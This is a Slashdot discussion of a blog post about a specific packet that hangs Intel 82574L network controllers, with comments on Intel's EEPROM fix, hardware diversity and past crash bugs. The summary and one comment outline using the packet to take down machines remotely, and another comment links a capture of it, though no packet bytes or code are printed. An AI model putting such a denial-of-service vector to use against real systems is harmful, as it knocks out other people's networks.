Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
×
Intel Networking Bug

Intel Gigabit NIC Packet of Death 137

An anonymous reader sends this quote from a blog post about a very odd technical issue and some clever debugging: "Packets of death. I started calling them that because that’s exactly what they are. ... This customer location, for some reason or another, could predictably bring down the ethernet controller with voice traffic on their network. Let me elaborate on that for a second. When I say “bring down” an ethernet controller I mean BRING DOWN an ethernet controller. The system and ethernet interfaces would appear fine and then after a random amount of traffic the interface would report a hardware error (lost communication with PHY) and lose link. Literally the link lights on the switch and interface would go out. It was dead. Nothing but a power cycle would bring it back. ... While debugging with this very patient reseller I started stopping the packet captures as soon as the interface dropped. Eventually I caught on to a pattern: the last packet out of the interface was always a 100 Trying provisional response, and it was always a specific length. Not only that, I ended up tracing this (Asterisk) response to a specific phone manufacturer’s INVITE. ... With a modified HTTP server configured to generate the data at byte value (based on headers, host, etc) you could easily configure an HTTP 200 response to contain the packet of death — and kill client machines behind firewalls!"
This discussion has been archived. No new comments can be posted.

Intel Gigabit NIC Packet of Death

Comments Filter:
  • Ouch (Score:5, Insightful)

    by Anonymous Coward on Wednesday February 06, 2013 @05:07PM (#42813479)

    I think an actual summary would have been a vast improvement over TFS.

    • The summary is pretty much word-for-word copy-pasta from his blog.. ..minus any of the useful formatting.

      • Re:Ouch (Score:5, Insightful)

        by whois ( 27479 ) on Wednesday February 06, 2013 @05:26PM (#42813721) Homepage

        It's pretty bad even by slashdot standards:

        'Let me elaborate on that for a second. When I say “bring down” an ethernet controller I mean BRING DOWN an ethernet controller.'

        This statement is worse than useless, it's a waste of space and a waste of your time to read it (I'm sorry I quoted it). The next sentence is okay but then they go back to 'Literally the link lights on the switch and interface would go out. It was dead.'

        Literally, this is a waste of the word literally. And it being dead was implied by everything stated above. The rest is informative but still in a conversational style that makes it hard to read, and it's lacking in details such as:

        What model of Ethernet controller was tested. What Firmware version are they using? Has the problem been reported to Intel?

        • Re:Ouch (Score:4, Informative)

          by chevelleSS ( 594683 ) on Wednesday February 06, 2013 @05:42PM (#42813891) Homepage
          If you read further down in the article, you would know that they worked with Intel and were given a patch to fix this issue. Brandon
        • tl;dr

        • Re:Ouch (Score:5, Informative)

          by el borak ( 263323 ) on Wednesday February 06, 2013 @05:48PM (#42813961)

          What model of Ethernet controller was tested. What Firmware version are they using? Has the problem been reported to Intel?

          I realize you found the article difficult to read, but it wasn't that long. 2/3 of your questions were addressed in the article.

          • Ethernet controller? 82574L
          • Reported? Yes, and Intel supplied an EEPROM fix.
          • What model of Ethernet controller was tested. What Firmware version are they using? Has the problem been reported to Intel?

            I realize you found the article difficult to read, but it wasn't that long. 2/3 of your questions were addressed in the article.

            • Ethernet controller? 82574L
            • Reported? Yes, and Intel supplied an EEPROM fix.

            It's Slashdot. Most people don't even read the whole summary before asking questions like that.

            • Re:Ouch (Score:5, Funny)

              by WarJolt ( 990309 ) on Wednesday February 06, 2013 @07:22PM (#42815017)

              Less /. bashing more Intel bashing please.

              • Intel needs to be bashed imo. They had that recent Core CPU bug, this network bug and they are ending buying the Mobo/CPU separate. And you see those articles everywhere and AMD has yelled at the top of their lungs that AMD isn't doing that and will offer the same things to enthusiasts building their own boards. I don't know why people act like Intel is the be all end all, they are definitely not; yet the articles fail to mention that. Absolutely not a thing wrong with AMD components.

            • Most people do not read the TITLE of the article before they start to bash. Never mind the summary.

          • Too bad Intel gave a fix to them (a fix they ultimately couldn't use), but hasn't to anyone else.

            Too bad Intel has also apparently known about the problem for months now.

            "Intel has been aware of this issue for several months. They also have a fix. However, they haven't publicized it because they don't know how widespread it is."

            Bullshit. I bet they were hoping to very quietly roll it into a driver update and have it all go away.

            • by TheLink ( 130905 )
              Maybe the spooks told them to keep the bug unfixed in the wild ;).
            • I don't think it is too bad. I'm going to use this for the router log in screen and expose it to the world.

              Imagine how many script kiddies and infected drones will go down when they probe my ports and try to connect. I can imagine the look on their faces when they lose connection for trying to "hack" into someone's network.

            • Bullshit. I bet they were hoping to very quietly roll it into a driver update and have it all go away.

              Yes, that would be ideal for everyone. If it just silently went away, that also means it wasn't much of a problem ... that means it didn't get used as a massive exploit. Thats good.

              There is no scenario where 'going away' is a bad thing, unless you're just all angsty and looking for a reason to tell 'the man' how much he sucks.

        • by noc007 ( 633443 )

          82574L was the Intel NIC.

          I'm surprised that Intel NICs are held in such high regard, yet there are some really detrimental bugs.

          CSB:
          I just bought a three port daughterboard for a Jetway ITX mobo I am planning on using as a pfSense FW. Their Gen2 daughterboard uses this chip, but thankfully I didn't spend the extra $50 on the Gen2 compatible board and went with a Gen1 that uses 82541PI. Hopefully that one doesn't have the same issue.

          • by Anonymous Coward

            The 82541 has worse bugs and worse performance. Besides, the 82574L is used instead of the RealTek RTL 81xx and its ilk. The RTL81xx crap is MUCH worse, as it is unfixable: slow, dumb, and requires severe performance reducing measures that dumbs it down to fastethernet-like levels of hardware assistance to even survive without causing rogue pci master transactions (aka rogue DMA over whatever is after the packet buffer), you cannot even use that RTL LOM NIC with jumbo frames without risking PCIe stalls eve

          • Re:Ouch (Score:5, Informative)

            by sirsnork ( 530512 ) on Wednesday February 06, 2013 @07:48PM (#42815233)

            Intel NIC's are held in high regard because a) they are fixed when a problem is found, and b) the bugs are documented.

            You should have a look through some of the CPU errata on Intel's site. it'll open your eyes as to just how many bugs a desktop CPU has even once it's shipped

            • Too bad 3com isn't around any more. Well, not in any meaningful way. They used to rock this world.

  • by eksith ( 2776419 ) on Wednesday February 06, 2013 @05:10PM (#42813537) Homepage

    Whether it's your brand of switch, motherboard or even memory, never have the same across all machines if you can help it. The only time I'd recommend the same brand would be hard drives (due to concurrency issues), but then at least try go get them from different batches. If your lot of mobos will only handle one brand of memory for whatever reason even when cas latency is identical, then have two machines doing whatever it is you need to be doing.

    One kind of anything makes it easier to kill you swiftly in the end, whether it's by a ping of death or a biological disease.

    • by LordLimecat ( 1103839 ) on Wednesday February 06, 2013 @05:20PM (#42813673)

      One kind of thing makes it a zillion times easier to recognize a problem when it crops up, and makes it so you only ever have to troubleshoot an issue once.

      How much more awful would it be if something similar happened next week on more computers, and he had to troubleshoot it all over again-- not even knowing whether the machines had NICs in common?

      "Everything blew up" is a problem. "Everything blew up, I dont know why, and it will take 3 weeks to find a solution" is a huge problem. "Everything blew up AGAIN, and I it will take another 3 weeks because our environment is heterogenous" means you are out of a job.

      • by eksith ( 2776419 ) on Wednesday February 06, 2013 @05:48PM (#42813965) Homepage

        There's a good reason a lot of our equipment is slightly older. No, we don't use ancient stuff, but they're not 100% top of the line made yesterday either. And that's because each time a new mobo, memory and storage combo that looks like its worth purchasing comes to market, the first thing we do is run a few sample sets under everything we can throw at it. Usually problems are narrowed down within the first couple of weeks or so, but that's why we have separate people just for testing equipment.

        Now admittedly, it's getting harder with this economy so we have some people doing double duty on occasion (I've had to do a bit too when the flu came rolling in), but testing goes on for as long as we think is necessary before the combo goes live. We avoid a lot of the headaches that come with large deployments by keeping changes isolated to maybe 10-15 nodes at a time. It's a slow and steady rollout of mostly similar systems (maybe 3-4 identical) that helps us avoid down time.

        We're not Google and we don't pretend to be, but common sense goes a long way to avoiding hiccups like "everything blew up". I think the biggest issue was when hurricane Sandy hit and we weren't sure if the backup generators would come online (this is a big problem with things that need fuel and oil, but stay off for a long time), so we brought in a generator truck for that too, just in case. Again, avoiding one of anything.

        • by rot26 ( 240034 )
          Are We the Imperial We or the Editorial We?

          Curious.
        • Sounds, like you've found the balance point between bleeding edge (things are broken/buggy) and outdated (no longer supported/available).

          I wished more people would favor this approach. It would save money and time down the road. i.e. Planned Upgrade Path.

        • by antdude ( 79039 )

          Also, cheaper with older ones. I also don't buy the latest stuff. I want the stable anc cheap ones. Also, older stuff have issues worked out and known. I stopped being in first in line unless I get paid to use and test. :P

    • Replacements (Score:3, Insightful)

      by phorm ( 591458 )

      Errrr, no. Have you ever tried to deal with replacements and/or issues within a large organization where everything is different? It's hellish.

      Try tracking an issue across an enterprise of architecture when all the architecture is DIFFERENT. You also don't want to mix RAM, and drivers can be a real b**** for different motherboards. Oh, and RMA's things, not fun.

      Different brands of RAM. Yeah, you try a rack full of servers playing mix'n'match and see how well that works.

      Lastly... how many vendors/brands of e

      • by eksith ( 2776419 )

        See my reply to LordLimecat above.

        All machines get a barcode that let us pull up every component that went in, vendors, dates of installation and who touched what. For memory, I think we have 3 different vendors. Mobos are usually Asus and Supermicro with one or two Tyan. HDs are Samsung and WD with a couple more for SSDs that are special cases. Speaking of cases, we have Supermicro again and NORCO (for storage) primarily with a few Antec cases here and there.

        L3 switches are Cisco and Netgear, L2 is Netgear

    • Whether it's your brand of switch, motherboard or even memory, never have the same across all machines if you can help it. The only time I'd recommend the same brand would be hard drives (due to concurrency issues), but then at least try go get them from different batches.

      ...and then along comes something like the Seagate 7200.11 firmware bug from a few years back, which caused all drives of several related models to self-brick after a period of time.

    • by wbr1 ( 2538558 )
      tl;dr: monocultures suck.
  • QOTD (Score:5, Funny)

    by jlv ( 5619 ) on Wednesday February 06, 2013 @05:12PM (#42813561)

    ``Life is too short to be spent debugging Intel parts.''
                                    -- Van Jacobson

  • Wasn't there an old program (Nuke 'em on the Mac I think), that would send out-of-band data (whatever that was), and it would crash the TCP/IP stack on Windows NT 3.51? There was another program on Linux called Pam Slam or something like that, that would also bring down NT servers... Very popular in the early days of the web to bring down your competitor's website.

    • by Anonymous Coward
      As I recall, it was "WinNuke [wikipedia.org]", and it was best known for killing Windows 9x systems (though it seemingly also killed Windows 3.1 and early versions of Windows NT).
  • I would be curious to know if other versions like the Intel 82576 have the same vulnerability. Maybe we should crowd source this and people can post what they've tested with and received the same behavior.

    • by tippe ( 1136385 )

      FWIW, the 82580 doesn't seem to have this problem (that, or we have up-to-date EEPROMs that fix the issue...)

    • by ewieling ( 90662 )
      The Intel 82580 does not appear to have the same issue. All our network problems went away when we put in some cards based on that chip in our systems which used the Intel 82574L for the onboard LAN. Customers stopped screaming, sales stopped screaming, management stopped screaming and I was able to get some sleep.
  • Nice debugging (Score:5, Interesting)

    by Dishwasha ( 125561 ) on Wednesday February 06, 2013 @05:58PM (#42814079)

    I for one definitely appreciate the diligence of Kristian Kielhofner. Many years ago I was supporting a medium-sized hospital whose flat network kept having intermittent issues (and we all know intermittent issues are the worst to hunt down and resolve). Fortunately I was on-site that day and at the top of my game and after doing some ethereal sleuthing (what wireshark was called at the time), I happened to discover a NIC that was spitting out bad LLC frames. Doing some port tracking in the switches we were able to isolate which port it was on which happened to be at their campus across the street. Of all possible systems, the offending NIC was in their PACS. After pulling the PACS off the network for a while the problem went away and we had to get the vendor to replace the hardware.

  • by Zemplar ( 764598 ) on Wednesday February 06, 2013 @06:22PM (#42814349) Journal
    I'm glad Mr. Kielhofner contacted Intel about this issue and had Intel confirm the bug.

    Some years ago I had been diagnosing similar server NIC issues, and after many hours digging, Intel was able to determine the fault was due to the four-port server NIC being counterfeit. Damn good looking counterfeit part! I couldn't tell the difference between a real Intel NIC and counterfeit in front of me. Only with Intel's document specifying the very minor outward differences between a real and known counterfeit could I tell them apart.

    Intel NIC debugging step #1 = verify it's a real Intel NIC!
  • Intel NICs have (or at least had...) a very good reputation for performance and stability. Maybe this is a sign that their QA is starting to slip?
    • by SIGBUS ( 8236 )

      Maybe this is a sign that their QA is starting to slip?

      It wouldn't surprise me (but the problem may go well beyond Intel). Of the three motherboards that have ever failed on me over 30+ years, two were Intel (a D101GGC and a DG43NB). Neither of them were ever run from crap PSUs, and both had blown capacitors. Even weirder, the caps were all from respected capacitor firms (Nippon Chemi-Con on the DG43NB and Matsushita on the D101GGC). I guess it's a Good Thing that Intel is exiting the motherboard business.

      The third board that failed was an Abit KT7-RAID... one

      • Maybe whoever was building their boards for them got some counterfeit caps. In my experience, the worst brands for capacitor problems were MSI, Abit, and FIC. ECS was notorious as well, but I never owned one personally. But apparently nobody was immune; I've had a couple of Asus boards that developed cap issues, as well as other random gear from that era (Netgear Ethernet switches/routers, etc.)
    • I've worked a fair bit with the latest 1-Gig and 10-Gig parts (i350 and 82599). They seem pretty decent and stable, good enough for telecom use, though like all chips they do have a list of errata.

      The developers are fairly active about updating the linux drivers in the core kernel as well as on sourceforge. The new chips (the 10-gig one especially) are very flexible but this means the drivers are getting a lot more complex than they used to be. (The programming manual for the 82599 is 900 pages.)

  • Really?!?! (Score:4, Funny)

    by Anonymous Coward on Wednesday February 06, 2013 @07:07PM (#42814871)
    So by "bring down" you didn't just mean bring down, implying it was brought down, but you meant "BRING DOWN" (notice the caps), implying it was brought down (notice the italics). Such a critical distinction. If it was merely "brought down" this would hardly have been an issue. You could have simply ignored the dead router. As it stands, being brought down, this is a real problem, and you cannot ignore the dead router. Good job!
  • by Anonymous Coward

    I ran into a tg3 bug where as the tg3 firmware took the byte value that it expected for a destination port number and redirected the udp packets with that value at that location to the BMC/SMDC/ipmi card (as designed). The issue was that the firmware did not appear to understand that a UDP datagram could be up to 64k so up to 40 1500byte packets and was always looks for the destination port on all packets (not just the first as it should have been) so if the data in the packet matched the expectations tho

  • Intel, or possibly nation where the manufacturering happens, is that code was added into the chip to respond to a highly unlikely sequence. Then when you need to kill a large number of computers simply hit various web servers sending in the required packet. Now, if a nation is protected by a firewall, well, then this approach will not be that useful. However, if other nations do not have a centralized firewall/router, then it can be used to take down a nation.
  • Maybe, just maybe, some frames could trigger an internal monitoring or debugging mode on the controller? Sometimes, manufacturers would want to remotely diagnose hardware, and that could be a way to do it. Of course, it could also be something else, much more sinister like, say, some obscure government backdoor. Not saying that this applies to this particular case, but since most silicon designs aren't open source, we can't be sure there's no such thing in there, lurking, waiting to be activated.
  • IIRC,. this is a known issue for certain chipsets, disabling power management for the PCI-E port the interface is a attached to in the BIOS is the known work-around.
  • I started stopping the packet captures as soon as the interface dropped

    Yes, that's usually when my packet captures stop, too.

  • Rules for adblock plus:
    ibtimes.co.uk##.ibt_con_artaux.f_rht
    ibtimes.co.uk###bg_header
    ibtimes.co.uk##.fb-like.fb_edge_widget_with_comment.fb_iframe_widget
    ibtimes.co.uk##.twitter-follow-button.twitter-follow-button
    ibtimes.co.uk##IMG[style="border:0;width:20px;height:20px; margin-top:-10px;"]
    ibtimes.co.uk###scrollbox
    ibtimes.co.uk###taboola-grid-3x2
    ibtimes.co.uk##.f_lft.morebox
    ibtimes.co.uk###wrap_bottom
    ibtimes.co.uk##.bk_basic.bk_disqus
  • We posted the offending packet on CloudShark, with links to all of Kristian's articles. Check it out here: http://appliance.cloudshark.org/news/cloudshark-in-the-wild/intel-packet-of-death-capture/ [cloudshark.org]

It is easier to write an incorrect program than understand a correct one.

Working...